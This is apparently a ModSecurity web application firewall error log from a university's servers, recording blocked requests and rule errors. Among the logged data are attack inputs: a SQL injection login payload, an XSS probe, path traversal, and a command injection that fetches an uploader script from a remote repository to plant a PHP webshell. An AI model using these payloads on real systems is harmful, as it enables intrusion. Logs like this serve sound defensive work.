[Tue Aug 29 00:00:13.478595 2023] [:error] [pid 56014] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:,.*?[)\\\\da-f\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98][\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98](?:[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98].*?[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]|\\\\Z|[^\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]+))|(?:\\\\Wselect.+\\\\W*?from)|((? ..." at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "209"] [id "981257"] [msg "Detects MySQL comment-/space-obfuscated injections and backtick termination"] [data "Matched Data: , IR., MT\\x22;s:17:\\x22level_member1unla\\x22;s:1: found within REQUEST_COOKIES:ci_session: a:10:{s:10:\\x22session_id\\x22;s:32:\\x221b9f94229ee3fd61682db91a6999c1c2\\x22;s:10:\\x22ip_address\\x22;s:15:\\x22203.176.176.235\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWeb\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693242005\\x22;s:20:\\x22status_aktifasi1unla\\x22;s:1:\\x221\\x22;s:12:\\x22user_id1unla\\x22;s:6:\\x22553113\\x2 [hostname "www.unla.ac.id"] [uri "/index.php/user/index"] [unique_id "ZOzSncCo-f0AANrOEikAAAAN"]
[Tue Aug 29 00:08:30.792814 2023] [:error] [pid 56101] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:logPassword. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  1=1 found within ARGS:logPassword: rahasia' or 1=1 #"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/index.php/user/ext_login"] [unique_id "ZOzUjsCo-f0AANslqJwAAAAT"]
[Tue Aug 29 00:12:38.092855 2023] [:error] [pid 56301] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:logUsername. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>window found within ARGS:logUsername: <script>window.alert(\\x22T\\x22)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/index.php/user/ext_login"] [unique_id "ZOzVhsCo-f0AANvt1TAAAAAE"]
[Tue Aug 29 04:16:29.301424 2023] [:error] [pid 58858] [client 13.81.5.87] ModSecurity: Rule 7fe1c6775ef8 [id "973302"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"][line "309"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "unla.ac.id"] [uri "/wp-plain.php"] [unique_id "ZO0OrcCo-f0AAOXqfQkAAAAB"]
[Tue Aug 29 05:40:06.285011 2023] [:error] [pid 60102] [client 103.119.98.179] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\A|[^\\\\d])0x[a-f\\\\d]{3,}[a-f\\\\d]*)+" at ARGS:alfa3. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "55"] [id "981260"] [rev "2"] [msg "SQL Hex Encoding Identified"] [data "Matched Data: h0XC12 found within ARGS:alfa3: AD42WxQTWlsrDAtGFRcbXz4QexkfMHYhHT0xAzg9Ih8uLQdFFD5hECwtHFoELQdHLRchQQMTIUUsAzEAOAA9HhY6Kh8XPTVGABMXCAA9B0QtAzlJLy06Ry8tBwYsZzUBBgMMRRYTaEc7HxgeLRR3Hy8DaFo4WDkLFjILRywDF0kXKQ8DLgcHRi1mOUcsKVZdFQBpWTllHBkVPTJYHS4cWhMtOUgWPXBKF3ZoDhcufVosMhNfLAwtWy13JV0GLRtAPhAcHisfKh0XLmlaOyIHSC8iDAYCPWgDFEglXy89BEYsZylfA3UDXRYoG1gAZR8DHzB2IQQ5GAs7LQMQFi51fg0tEB4EOQwLLz0XAxcHIVsuAyFILHYPAAoEAFsrEB8eAjkQGB47Oh8FKQBXHgNgFSk9CFQvBwdHFABTWCspC10rdxtGOTkbAwYQCBwvFAtfOAQEQQUEJUAUDAM..."] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-content/1/-/index1.php"] [unique_id "ZO0iRsCo-f0AAOrG6oYAAAAO"]
[Tue Aug 29 05:54:00.171318 2023] [:error] [pid 60221] [client 103.119.98.179] ModSecurity: Rule 7fe1c6c1f5d0 [id "981243"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "245"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-content/1/-/index1.php"] [unique_id "ZO0liMCo-f0AAOs9RGoAAAAB"]
[Tue Aug 29 05:54:03.173105 2023] [:error] [pid 60221] [client 103.119.98.179] ModSecurity: Rule 7fe1c6c1f5d0 [id "981243"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "245"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-content/uploads/2020/"] [unique_id "ZO0li8Co-f0AAOs9RGsAAAAB"]
[Tue Aug 29 05:57:08.262210 2023] [:error] [pid 60280] [client 103.119.98.179] ModSecurity: Rule 7fe1c6c1f5d0 [id "981243"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "245"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-content/1/-/index1.php"] [unique_id "ZO0mRMCo-f0AAOt4KzcAAAAO"]
[Tue Aug 29 05:57:15.188133 2023] [:error] [pid 60272] [client 103.119.98.179] ModSecurity: Rule 7fe1c6c1f5d0 [id "981243"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "245"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-content/1/-/index1.php"] [unique_id "ZO0mS8Co-f0AAOtwKD8AAAAN"]
[Tue Aug 29 05:57:18.073556 2023] [:error] [pid 60272] [client 103.119.98.179] ModSecurity: Rule 7fe1c6c1f5d0 [id "981243"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "245"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-content/uploads/2020/"] [unique_id "ZO0mTsCo-f0AAOtwKEAAAAAN"]
[Tue Aug 29 06:09:49.505688 2023] [:error] [pid 60386] [client 68.219.104.180] ModSecurity: Rule 7fe1c6775ef8 [id "973302"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"][line "309"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "journal.unla.ac.id"] [uri "/cgi-bin/mt/mt-xmlrpc.cgi"] [unique_id "ZO0pPcCo-f0AAOvioSgAAAAA"]
[Tue Aug 29 06:09:51.652891 2023] [:error] [pid 60396] [client 68.219.104.180] ModSecurity: Rule 7fe1c6775ef8 [id "973302"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"][line "309"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "journal.unla.ac.id"] [uri "/mt/mt-xmlrpc.cgi"] [unique_id "ZO0pP8Co-f0AAOvs0q4AAAAG"]
[Tue Aug 29 06:09:53.944090 2023] [:error] [pid 60340] [client 68.219.104.180] ModSecurity: Rule 7fe1c6775ef8 [id "973302"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"][line "309"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "journal.unla.ac.id"] [uri "/cgi-bin/mt-xmlrpc.cgi"] [unique_id "ZO0pQcCo-f0AAOu0N-0AAAAE"]
[Tue Aug 29 06:09:56.634424 2023] [:error] [pid 60351] [client 68.219.104.180] ModSecurity: Rule 7fe1c6775ef8 [id "973302"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"][line "309"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "journal.unla.ac.id"] [uri "/mt-xmlrpc.cgi"] [unique_id "ZO0pRMCo-f0AAOu-YaoAAAAR"]
[Tue Aug 29 06:09:59.213904 2023] [:error] [pid 60507] [client 68.219.104.180] ModSecurity: Rule 7fe1c6775ef8 [id "973302"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"][line "309"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "journal.unla.ac.id"] [uri "/cgi-bin/MT/mt-xmlrpc.cgi"] [unique_id "ZO0pR8Co-f0AAOxbex4AAAAH"]
[Tue Aug 29 06:10:01.298453 2023] [:error] [pid 60433] [client 68.219.104.180] ModSecurity: Rule 7fe1c6775ef8 [id "973302"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"][line "309"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "journal.unla.ac.id"] [uri "/MT/mt-xmlrpc.cgi"] [unique_id "ZO0pScCo-f0AAOwR0lsAAAAJ"]
[Tue Aug 29 06:10:03.180858 2023] [:error] [pid 60396] [client 68.219.104.180] ModSecurity: Rule 7fe1c6775ef8 [id "973302"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"][line "309"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "journal.unla.ac.id"] [uri "/mtos/mt-xmlrpc.cgi"] [unique_id "ZO0pS8Co-f0AAOvs0q8AAAAG"]
[Tue Aug 29 06:10:05.451473 2023] [:error] [pid 60508] [client 68.219.104.180] ModSecurity: Rule 7fe1c6775ef8 [id "973302"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"][line "309"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "journal.unla.ac.id"] [uri "/cms/mt-xmlrpc.cgi"] [unique_id "ZO0pTcCo-f0AAOxcO5IAAAAO"]
[Tue Aug 29 06:10:07.832276 2023] [:error] [pid 60396] [client 68.219.104.180] ModSecurity: Rule 7fe1c6775ef8 [id "973302"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"][line "309"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "journal.unla.ac.id"] [uri "/blog/mt-xmlrpc.cgi"] [unique_id "ZO0pT8Co-f0AAOvs0rEAAAAG"]
[Tue Aug 29 06:10:10.313076 2023] [:error] [pid 60508] [client 68.219.104.180] ModSecurity: Rule 7fe1c6775ef8 [id "973302"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"][line "309"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "journal.unla.ac.id"] [uri "/cgi/mt-xmlrpc.cgi"] [unique_id "ZO0pUsCo-f0AAOxcO5MAAAAO"]
[Tue Aug 29 06:10:31.683397 2023] [:error] [pid 60386] [client 68.219.104.180] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filepath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:filepath: ../../../x.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/wpcargo/includes/barcode.php"] [unique_id "ZO0pZ8Co-f0AAOvioS4AAAAA"]
[Tue Aug 29 06:10:32.939019 2023] [:error] [pid 60433] [client 68.219.104.180] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:2. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:2: wget https:/raw.githubusercontent.com/tanjim530/Private_exploit/main/uploader.txt -O king.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-content/x.php"] [unique_id "ZO0paMCo-f0AAOwR0l4AAAAJ"]
[Tue Aug 29 06:13:50.116255 2023] [:error] [pid 60350] [client 114.124.188.122] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "52.167.144.182_bba275c17a45b4645f097ed00f67970e62d5eca4"): Internal error [hostname "www.unla.ac.id"] [uri "/application/frontend/m_product.js"] [unique_id "ZO0qLcCo-f0AAOu@xIgAAAAQ"]
[Tue Aug 29 06:13:50.156153 2023] [:error] [pid 60508] [client 114.124.161.42] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "85.208.96.197_13a697b6c30ffc8426616729e8c141171ad52ccd"): Internal error [hostname "www.unla.ac.id"] [uri "/application/frontend/m_image.js"] [unique_id "ZO0qLcCo-f0AAOxcO7IAAAAO"]
[Tue Aug 29 06:13:50.156153 2023] [:error] [pid 60509] [client 114.124.161.42] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "85.208.96.197_13a697b6c30ffc8426616729e8c141171ad52ccd"): Internal error [hostname "www.unla.ac.id"] [uri "/application/frontend/utility/u3_usergroup.js"] [unique_id "ZO0qLsCo-f0AAOxda8kAAAAS"]
[Tue Aug 29 06:13:50.156218 2023] [:error] [pid 60433] [client 114.124.161.42] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "85.208.96.197_13a697b6c30ffc8426616729e8c141171ad52ccd"): Internal error [hostname "www.unla.ac.id"] [uri "/application/frontend/main/control_page.js"] [unique_id "ZO0qLsCo-f0AAOwR0oAAAAAJ"]
[Tue Aug 29 06:13:50.229313 2023] [:error] [pid 60550] [client 114.124.163.122] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "52.167.144.59_bba275c17a45b4645f097ed00f67970e62d5eca4"): Internal error [hostname "www.unla.ac.id"] [uri "/application/frontend/find_m.js"] [unique_id "ZO0qLsCo-f0AAOyGNa0AAAAA"]
[Tue Aug 29 06:13:50.268505 2023] [:error] [pid 60350] [client 114.124.188.122] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "196.240.58.54_58c86affda39d1422393b4ef26670d29a37e74ec"): Internal error [hostname "www.unla.ac.id"] [uri "/application/frontend/utility/u2_jdashboard.js"] [unique_id "ZO0qLsCo-f0AAOu@xIkAAAAQ"]
[Tue Aug 29 06:13:50.268545 2023] [:error] [pid 60392] [client 114.124.161.42] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "196.240.58.54_fee81161e61fd48e14d21c3046951ca3c5ec25d8"): Internal error [hostname "www.unla.ac.id"] [uri "/application/frontend/upload_m.js"] [unique_id "ZO0qLsCo-f0AAOvoG4MAAAAP"]
[Tue Aug 29 06:13:50.309434 2023] [:error] [pid 60433] [client 114.124.161.42] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "196.240.58.54_fee81161e61fd48e14d21c3046951ca3c5ec25d8"): Internal error [hostname "www.unla.ac.id"] [uri "/application/frontend/utility/u4_otority.js"] [unique_id "ZO0qLsCo-f0AAOwR0oEAAAAJ"]
[Tue Aug 29 06:13:50.344983 2023] [:error] [pid 60550] [client 114.124.163.122] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "43.225.191.42_fee81161e61fd48e14d21c3046951ca3c5ec25d8"): Internal error [hostname "www.unla.ac.id"] [uri "/application/frontend/utility/u6_userlog.js"] [unique_id "ZO0qLsCo-f0AAOyGNa4AAAAA"]
[Tue Aug 29 06:13:50.380134 2023] [:error] [pid 60508] [client 114.124.161.42] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "43.225.191.42_019bcaf99857cb9cf4b30592477699d826fc011c"): Internal error [hostname "www.unla.ac.id"] [uri "/application/frontend/utility/u1_menu.js"] [unique_id "ZO0qLsCo-f0AAOxcO7MAAAAO"]
[Tue Aug 29 06:23:09.283141 2023] [:error] [pid 60603] [client 103.119.98.179] ModSecurity: Rule 7fe1c6c1f5d0 [id "981243"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "245"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-content/uploads/2020/"] [unique_id "ZO0sXcCo-f0AAOy7k6QAAAAJ"]
[Tue Aug 29 07:38:11.440214 2023] [:error] [pid 61674] [client 103.119.98.179] ModSecurity: Rule 7fe1c67a55d0 [id "981243"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "245"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-content/1/-/index1.php"] [unique_id "ZO0988Co-f0AAPDqUEQAAAAD"]
[Tue Aug 29 08:03:38.098236 2023] [:error] [pid 61917] [client 114.5.219.165] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "202.162.195.90_bb710904d540c9b3464319d542f019b4af40a330"): Internal error [hostname "www.unla.ac.id"] [uri "/application/frontend/dashboard/dashboard_jadwalkul.js"] [unique_id "ZO1D6sCo-f0AAPHdZVcAAAAI"]
[Tue Aug 29 08:03:38.098280 2023] [:error] [pid 61987] [client 114.5.219.165] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "202.162.195.90_bb710904d540c9b3464319d542f019b4af40a330"): Internal error [hostname "www.unla.ac.id"] [uri "/application/frontend/dashboard/dashboard_mhs.js"] [unique_id "ZO1D6sCo-f0AAPIjH1IAAAAE"]
[Tue Aug 29 08:03:38.098389 2023] [:error] [pid 61984] [client 114.5.219.165] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "202.162.195.90_bb710904d540c9b3464319d542f019b4af40a330"): Internal error [hostname "www.unla.ac.id"] [uri "/application/frontend/dashboard/dashboard_rektor.js"] [unique_id "ZO1D6sCo-f0AAPIgTfgAAAAL"]
[Tue Aug 29 08:03:38.138175 2023] [:error] [pid 61881] [client 114.5.219.165] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "52.167.144.172_bba275c17a45b4645f097ed00f67970e62d5eca4"): Internal error [hostname "www.unla.ac.id"] [uri "/index.php/c_mastah/grid_vstsemester"] [unique_id "ZO1D6sCo-f0AAPG5iyUAAAAC"]
[Tue Aug 29 08:49:54.015171 2023] [:error] [pid 62351] [client 103.147.8.47] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "36.255.189.229_f293efc8d356d11e1581e5e4e12fb482f7eefbfa"): Internal error [hostname "www.unla.ac.id"] [uri "/resources/img/ori/upacara_hutri2023.png"] [unique_id "ZO1Ov8Co-f0AAPOPRHoAAAAD"]
[Tue Aug 29 09:10:40.351926 2023] [:error] [pid 62949] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1ToMCo-f0AAPXlye4AAAAA"]
[Tue Aug 29 09:10:41.623462 2023] [:error] [pid 62949] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1TocCo-f0AAPXlye8AAAAA"]
[Tue Aug 29 09:10:44.252908 2023] [:error] [pid 62949] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1TpMCo-f0AAPXlyfAAAAAA"]
[Tue Aug 29 09:12:30.355553 2023] [:error] [pid 62949] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1UDsCo-f0AAPXlyfMAAAAA"]
[Tue Aug 29 09:12:31.416293 2023] [:error] [pid 62949] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1UD8Co-f0AAPXlyfQAAAAA"]
